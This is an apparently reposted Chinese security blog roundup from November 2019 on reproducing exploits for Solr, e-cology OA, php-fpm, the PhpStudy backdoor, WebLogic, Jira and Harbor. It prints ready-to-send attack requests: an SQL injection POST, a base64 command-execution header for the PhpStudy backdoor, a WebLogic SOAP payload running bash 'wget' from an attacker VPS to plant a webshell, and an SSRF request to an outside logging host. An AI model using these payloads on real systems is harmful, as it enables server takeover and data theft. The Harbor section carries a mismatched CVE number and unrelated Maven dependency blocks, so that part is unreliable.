近期重要漏洞攻击验证情况 2019-11-8

Posted suiyujunshu

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了近期重要漏洞攻击验证情况 2019-11-8相关的知识,希望对你有一定的参考价值。

近期重要漏洞攻击验证情况

一、      Apache Solr Velocity TemplateCVE-2019-0193-RCE

验证描述

Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。

Apache Solr基于Velocity模板存在远程命令执行漏洞。该漏洞是由于Velocity模板存在注入所致。攻击者可利用漏洞访问Solr服务器上Core名称,先把params.resource.loader.enabled设置为true(就可加载指定资源),在服务器执行命令。

验证信息

POC https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/

注:以上验证信息(方法)可能带有攻击性,仅供安全研究之用。请广大用户加强对漏洞的防范工作,尽快下载相关补丁。

 

二、 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞

 

验证描述

泛微e-cology OA 系统的前台接口WorkflowCenterTreeData 在使用 Oracle 数据库时存在未授权 SQL 注入漏洞。

 

验证信息

1.测试时要注意是否有授权

2.漏洞点在

/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333

3.所使用的POC如下:

POST

/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333

HTTP/1.1
Host: xxxxx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Cookie: testBanCookie=test; JSESSIONID=abcPFN5zZe8gbgbso7i3w; ecology_JSessionId=abcPFN5zZe8gbgbso7i3w
Upgrade-Insecure-Requests: 1
Content-Length: 2238
formids=11111111111))) 0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

三、php-fpm (CVE-2019-11043)漏洞

验证描述

来自Wallarm的安全研究员Andrew Danau在9月14号至16号举办的Real World CTF中,向服务器发送%0a(换行符)时,服务器返回异常信息,疑似存在漏洞。

nginx使用特定的fastcgi配置时,存在远程代码执行漏洞,但这个配置并非Nginx默认配置。

当fastcgi_split_path_info字段被配置为 ^(.+?.php)(/.*)$;时,攻击者可以通过精心构造的payload,造成远程代码执行漏洞,该配置已被广泛使用,危害较大。

验证信息

下载攻击脚本

go get github.com/neex/phuip-fpizdam     # 默认下载之后会保存到前面

配置的go 的工作目录

 

配置docker 靶机

git clone https://github.com/neex/phuip-fpizdam.git

cd reproducer/

docker build -t reproduce-cve-2019-11043 .      # 注意后面有个点

docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043    # 运行靶机

靶机运行之后查看是否运行正常

 

靶机运行正常,利用poc 工具攻击靶机 验证服务器有漏洞的输出界面

 

 

第二次重新运行脚本,脚本会一直向服务器发包,这时在浏览器打开靶机地址,直接执行命令即可(url如下要多试几次才可以)

http://192.168.124.141:8080/script.php?a=id

利用成功结果如图

四、PhpStuday后门

验证描述

 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、mysql、phpMyAdmin、ZendOptimizer多款软件一次性安装,无 需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户,9月20日杭州公安微信公众账号发布了“杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果”的文章,文章里说明phpstudy存在“后门”。

 

验证信息

启动漏洞版本对应的版本

 

成功启动环境

 

拦截数据包,添加如下的请求头字段:

Accept-Encoding中逗号后面的空格要去掉

Accept-Encoding: gzip,deflate

Accept-Charset为echo system(‘whoami‘)的base64编码

Accept-Charset: ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==

 

完整数据包利用的payload

GET / HTTP/1.1 Host: 10.211.55.3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Charset: 您添加的base64加密的执行语句 Accept-Language: zh-CN,zh;q=0.9 Connection: close

执行whoami相关回显

 

尝试ipconfig

 

python验证脚本截图:

 

五、 Weblogic高危漏洞复现 CVE-2019-2890

验证描述

 WebLogic 是 Oracle 公司出品的基于 JavaEE 架构的中间件,用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用。

Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单,使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。

 由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。

验证信息

linux下weblogic10.3.6复现

1.环境搭建

Weblogic10.3.6环境搭建参考:

https://blog.csdn.net/qq_27298687/article/details/82767247

2.漏洞路径

访问http://ip:port/_async/AsyncResponseService出现如下页面,可能存在该漏洞。

 

3.上传webshell

首先在公网vps中放如webshell,这里用weblogic.txt代替,内容为“hello word!!!”

然后使用burpsuite重放如下报文

POST /_async/AsyncResponseService HTTP/1.1Host: 192.168.37.128:7001Content-Length: 859Accept-Encoding: gzip, deflateSOAPAction:Accept: */*User-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: keep-alivecontent-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

六、Jira未授权SSRF漏洞复现

验证描述

Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。

 docker进行搭建,下载地址:

 docker pull cptactionhank/atlassian-jira:7.8.0

 环境启动:

 docker run --detach 

 --publish 8080:8080cptactionhank/atlassian-jira:7.8.0

 

验证信息

  1. http://yourip:8080访问安装(选择第二个安装)

 

下一步:

 

    下一步:(PS:需要生成使用许可)

 

 下一步:

 

 下一步,至此安装完成。

2.访问:

http://192.168.100.128:8080/secure/Dashboard.jspa进行抓包,替换POC,得到以下信息,说明漏洞存在。

 

在http://ceye.io/records/dns中可看到有NDS流量记录。

 

1.搭建环境时注意要申请使用许可

2.学海(安全圈)无涯苦作舟。

3.漏洞点在/plugins/servlet/gadgets/makeRequest

4.漏洞参考:

https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A

5.所使用的POC如下:

GET/plugins/servlet/gadgets/makeRequest?url=http://192.168.100.128:8080@test.sykwca.ceye.ioHTTP/1.1

Host:192.168.100.128:8080

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding:gzip, deflate

Connection: close

Referer: http://192.168.100.128:8080/secure/Dashboard.jspa

X-Atlassian-Token:no-check

Upgrade-Insecure-Requests:1

Cache-Control:max-age=0

七、CVE-2019-1609 Harbor任意管理员注册漏洞

验证描述

Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全。提升用户使用Registry构建和运行环境传输镜像的效率。Harbor支持安装在多个Registry节点的镜像资源复制,镜像全部保存在私有Registry中, 确保数据和知识产权在公司内部网络中管控。

 

验证信息

1、安装docker

安装docker有很多问题可以查看这个                   

https://www.cnblogs.com/yufeng218/p/8370670.html

 

测试是否安装成功

 

  1. 2.    下载并安装harbor

1、Wgethttps://storage.googleapis.com/harbor-releases/release-1.8.0/harbor-online-installer-v1.8.1.tgz

2、tarxvf harbor-online-installer-v1.8.0.tgz

 

修改hostname为安装Harbor机器的IP地址

1、cd harbor

2、vi harbor.yml

 

安装harbor,

1、./install.sh

访问地址就能进入harbor后台。

 

 

使用admin账户登陆后发现已经成功写入帐号(admin账户密码在配置文件harbor.yml查看),并且为管理员权限。

 

 

poc地址https://github.com/dacade/cve-2019-16097

<dependency>
    <groupId>com.fasterxml.jackson.core</groupId>
    <artifactId>jackson-databind</artifactId>
    <version>2.9.8</version>
</dependency>

<!--https://mvnrepository.com/artifact/ch.qos.logback/logback-core -->
<dependency>
    <groupId>ch.qos.logback</groupId>
    <artifactId>logback-core</artifactId>
    <version>1.3.0-alpha4</version>
</dependency>

<!--https://mvnrepository.com/artifact/com.h2database/h2 -->
<dependency>
    <groupId>com.h2database</groupId>
    <artifactId>h2</artifactId>
    <version>1.4.199</version>
    <scope>test</scope>
</dependency>
<dependency>
    <groupId>com.h2database</groupId>
    <artifactId>h2</artifactId>
    <version>1.4.199</version>
    <scope>compile</scope>
</dependency> 

以上是关于近期重要漏洞攻击验证情况 2019-11-8的主要内容,如果未能解决你的问题,请参考以下文章

漏洞预警|关于WebLogic Server WLS核心组件 存在反序列化漏洞

JBOOS反序列化漏洞复现

[漏洞预警]利用Memcached 服务器实施反射DDos攻击情况报告

6.JBoss5.x6.x 反序列化漏洞(CVE-2017-12149)复现

(CVE-2017-12149) JBOSS Application Server反序列化命令执行

UTM篇&IPS ❀ 02. 防范Log4j远程代码执行漏洞攻击 ❀ 飞塔 (Fortinet) 防火墙